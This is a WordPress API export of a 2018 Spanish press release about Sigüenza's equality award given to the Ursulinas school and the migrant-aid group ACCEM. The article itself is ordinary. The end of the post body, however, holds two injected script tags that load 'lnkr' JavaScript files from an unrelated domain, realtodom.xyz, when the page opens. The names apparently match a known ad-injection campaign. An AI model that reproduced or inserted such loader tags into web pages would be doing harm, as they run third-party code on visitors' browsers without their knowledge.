{"id":241,"date":"2018-07-30T12:50:20","date_gmt":"2018-07-30T12:50:20","guid":{"rendered":"http:\/\/www.bandopress.com\/notas-de-prensa\/?p=241"},"modified":"2018-07-30T12:50:20","modified_gmt":"2018-07-30T12:50:20","slug":"siguenza-entrega-la-xv-edicion-del-premio-por-la-igualdad-a-ursulinas-y-accem","status":"publish","type":"post","link":"http:\/\/www.bandopress.com\/notas-de-prensa\/2018\/07\/30\/siguenza-entrega-la-xv-edicion-del-premio-por-la-igualdad-a-ursulinas-y-accem\/","title":{"rendered":"Sig\u00fcenza entrega la XV edici\u00f3n del premio por la igualdad a Ursulinas y ACCEM"},"content":{"rendered":"<p><strong>Como destacaba ayer la concejala de Mujer del Ayuntamiento, Charo Toro, ambas instituciones, en el devenir de su trabajo diario, han logrado reducir las diferencias entre hombres y mujeres, y adem\u00e1s, acaban de cumplir importantes efem\u00e9rides, motivos ambos por los que fueron distinguidas<\/strong><\/p>\n<p>El Ayuntamiento de Sig\u00fcenza entreg\u00f3 ayer la XV edici\u00f3n del premio &#8216;Ciudad de Sig\u00fcenza por la Igualdad&#8217;, que concede a trav\u00e9s de su Concejal\u00eda de Igualdad y del Centro de la Mujer, a RR.MM Ursulinas-C.E. Sagrada Familia y Centro de Migraciones-ACCEM. El galard\u00f3n, que se entrega de forma anual, es un reconocimiento a aquellas personas o entidades que, con su trabajo diario, han logrado reducir las diferencias entre hombres y mujeres. \u00abQueremos una calidad de vida \u00f3ptima para quienes viven en Sig\u00fcenza y sabemos que apostar por la igualdad de trato y oportunidades es clave para el desarrollo de una sociedad mejor\u00bb, afirm\u00f3 ayer Jos\u00e9 Manuel Latre, alcalde de Sig\u00fcenza, en la presentaci\u00f3n de la entrega. El regidor felicit\u00f3 adem\u00e1s \u00abal personal de ambas instituciones por su labor en el municipio\u00bb.<\/p>\n<p>En 2018, el Ayuntamiento ha decidido otorgar el premio de forma conjunta puesto que ambas organizaciones comparten el trabajo para lograr la igualdad de oportunidades para todas las personas, las unas desde la educaci\u00f3n y los otros desde el \u00e1mbito socio-laboral. Asimismo, Ursulinas y ACCEM han cumplido a\u00f1os recientemente, e igualmente ambas entidades nacieron en Sig\u00fcenza, con &#8216;estrella&#8217;, pues su primera ubicaci\u00f3n fue, precisamente, en esa calle de la ciudad. De la misma manera, Ursulinas y ACCEM consideran clave para lograr una sociedad m\u00e1s justa e igualitaria la colaboraci\u00f3n y cooperaci\u00f3n estrecha entre todos los agentes sociales: administraciones p\u00fablicas y cada persona, de manera individual. \u00abEn el Ayuntamiento opinamos esto mismo. Todos tenemos que remar en la misma direcci\u00f3n y con este criterio. Por eso, la concesi\u00f3n del premio, es una doble satisfacci\u00f3n, porque reconoce los logros de ambas entidades, pero tambi\u00e9n lo es porque demuestra que han logrado esa relaci\u00f3n fluida entre todos los agentes sociales implicados en la lucha por la igualdad de g\u00e9ner\u00bb, dijo Latre.<\/p>\n<p>Fue la concejala de Mujer, Charo Toro, la que se encarg\u00f3 de fundamentar los premios, empezando por las Ursulinas. Pero antes que nada, pidi\u00f3 un reconocimiento p\u00fablico para la labor de las trabajadoras del Centro de la Mujer, Almudena del Pino y Marta Hern\u00e1ndez, que fue correspondido con una ovaci\u00f3n sonora. Las Madres Ursulinas, que en 2018 han cumplido 200 a\u00f1os en Sig\u00fcenza, han sido siempre un referente educativo en la ciudad. Se instalaron primeramente en el Hospital de la Estrella de la ciudad, m\u00e1s tarde pasaron por las casas de San Roque y, debido al n\u00famero de ni\u00f1as a las que ense\u00f1aban, tuvieron que reubicarse en el Palacio de los Infantes, sede actual de Los Josefinos. Finalmente, acabar\u00edan en su actual emplazamiento, un convento franciscano que hab\u00eda acogido anteriormente a monjas Carmelitas.<\/p>\n<p>Con el paso de los a\u00f1os y la llegada de nuevos tiempos, la educaci\u00f3n dej\u00f3 de estar separada para ni\u00f1os y ni\u00f1as, por lo que desde 1989 pasaron a formar parte del Colegio Episcopal Sagrada Familia. \u00abEducan por igual dentro y fuera de sus aulas, pues somos personas y como tal se nos debe valorar igual\u00bb, destac\u00f3 la concejala.<\/p>\n<p>Recogi\u00f3 la distinci\u00f3n, una preciosa placa del Taller Medieval, la Madre Asunci\u00f3n, en representaci\u00f3n de la instituci\u00f3n Ursulinas. \u00abDesde 1818, hemos hecho lo posible para hacer lo que nos ped\u00eda Santa \u00c1ngela de M\u00e9rici. Por eso es el colegio el que recibe el premio, no las que ahora trabajamos en \u00e9l. Como dec\u00eda nuestra madre, reitero que hay que gozar con lo que se ha hecho, pero no debemos olvidar lo que queda por hacer\u00bb. La Madre Asunci\u00f3n dio tambi\u00e9n la palabra al director de la SAFA, el padre Miguel Angel Garc\u00eda Tabernero. \u00abPara nosotros es un honor recibir un premio por algo que es obvio, que hombres y mujeres somos iguales\u00bb, se\u00f1al\u00f3.\u00a0<a href=\"https:\/\/www.youtube.com\/watch?v=trKPAuS1Omc&amp;t=3s\" rel=\"nofollow\">Ver intervenci\u00f3n<\/a><\/p>\n<p>La concejala glos\u00f3 igualmente la labor del Centro de Migraciones-ACCEM, \u00abque trabaja por y para las personas y para que entre ellas exista una igualdad real de derechos, de oportunidades de vida y de futuro\u00bb, cit\u00f3.<\/p>\n<p>Por esta instituci\u00f3n han pasado a lo largo de sus ya 26 a\u00f1os en Sig\u00fcenza, 6.000 personas. \u00abLa necesidad de ayuda, de apoyo de estas personas tan vulnerables hizo surgir en nuestra localidad un movimiento de voluntariado y participaci\u00f3n en las actividades propias del Centro tanto de personas refugiadas como del municipio\u00bb, record\u00f3.<\/p>\n<p>Desde la acogida de las personas refugiadas de Kosovo (1992), la poblaci\u00f3n seguntina se volc\u00f3 con esta iniciativa social, de tal manera que bien se puede decir que el Centro qued\u00f3 integrado para siempre en la ciudad a partir de entonces. \u00abEran tiempos en los que se necesitaba mano de obra y las personas migrantes colaboraron en el desarrollo social y laboral\u00bb, subray\u00f3 la concejala. Actualmente ACCEM-Sig\u00fcenza acoge a personas, de manera individual, pero tambi\u00e9n a familias que son alojadas en las viviendas sociales de que disponen. Adem\u00e1s de con personas migrantes, tambi\u00e9n trabajan con menores y mayores, y en \u00e1mbitos tan diversos como el fomento del empleo o el acceso a vivienda.<\/p>\n<p>En los inicios de su actividad, en 1992, s\u00f3lo ven\u00edan hombres, pero a mediados de los noventa ACCEM-Sig\u00fcenza acogi\u00f3 a una mujer con su hija, provenientes de Rusia. Poco a poco, su labor ha ido creciendo en la direcci\u00f3n de atenci\u00f3n a las familias. \u00abDesde su punto de vista, las mujeres se muestran fuertes, resueltas, con recursos y capacidad m\u00e1s que suficiente para salir adelante, a pesar de haber sufrido en sus propias carnes la violencia de g\u00e9nero. Son conscientes de esta problem\u00e1tica en muchas de las familias que llegan, por ello trabajan el empoderamiento de las mujeres y el conocimiento de la normativa espa\u00f1ola respecto a la mujer. Introducen de manera transversal la perspectiva de g\u00e9nero en todas las actividades que organizan y desarrollan\u00bb, destac\u00f3 la concejala en su presentaci\u00f3n.<\/p>\n<p>Braulio Carles, responsable territorial de ACCEM en Castilla-La Mancha, destac\u00f3 el trabajo en equipo que se lleva a cabo en la ciudad, ahora bajo la direcci\u00f3n de Ana Bel\u00e9n Sanz. \u00abEl equipo siempre est\u00e1 disponible, sin horarios, ni d\u00edas de la semana prestablecidos. Gracias a la gente, a los empresarios, a las parroquias, a los colegios, y en general a las instituciones de Sig\u00fcenza, a la cercan\u00eda con los alcaldes sucesivos, ahora con Jos\u00e9 Manuel Latre, de quien solo podemos tener buenas palabras, Sig\u00fcenza es hoy un referente de integraci\u00f3n y acogida\u00bb, dijo. Carl\u00e9s tambi\u00e9n se refiri\u00f3 a la igualdad de g\u00e9nero. \u00abEl 90% de las mujeres que llegan a ACCEM Sig\u00fcenza, son v\u00edctimas de trata, de violencia de g\u00e9nero y procedentes de pa\u00edses donde no hay redes sociales ni familiares que puedan ayudarles, y debo decir que, en general, tiene m\u00e1s fuerza interior, m\u00e1s recursos, para salir adelante en situaciones dif\u00edciles que los hombres. Trabajamos por la integraci\u00f3n de la mujer, por lograr su autonom\u00eda y su empoderamiento, y, contando con el esfuerzo de la gente de Sig\u00fcenza y sus pedan\u00edas, lo vamos consiguiendo. Como dice nuestro lema, gracias a ti todo esto es posible\u00bb. ACCEM Sig\u00fcenza recibi\u00f3 igualmente un detalle del Taller Medieval.\u00a0<a href=\"https:\/\/www.youtube.com\/watch?v=OF6T0Hs_hqw\" rel=\"nofollow\">Ver Braulio Carles<\/a><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<div class=\"mh-excerpt\"><p>Como destacaba ayer la concejala de Mujer del Ayuntamiento, Charo Toro, ambas instituciones, en el devenir de su trabajo diario, han logrado reducir las diferencias <a class=\"mh-excerpt-more\" href=\"http:\/\/www.bandopress.com\/notas-de-prensa\/2018\/07\/30\/siguenza-entrega-la-xv-edicion-del-premio-por-la-igualdad-a-ursulinas-y-accem\/\" title=\"Sig\u00fcenza entrega la XV edici\u00f3n del premio por la igualdad a Ursulinas y ACCEM\">[&#8230;]<\/a><\/p>\n<\/div>","protected":false},"author":1,"featured_media":242,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-241","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-castilla-la-mancha"],"_links":{"self":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/241","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/comments?post=241"}],"version-history":[{"count":1,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/241\/revisions"}],"predecessor-version":[{"id":243,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/241\/revisions\/243"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/media\/242"}],"wp:attachment":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/media?parent=241"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/categories?post=241"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/tags?post=241"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}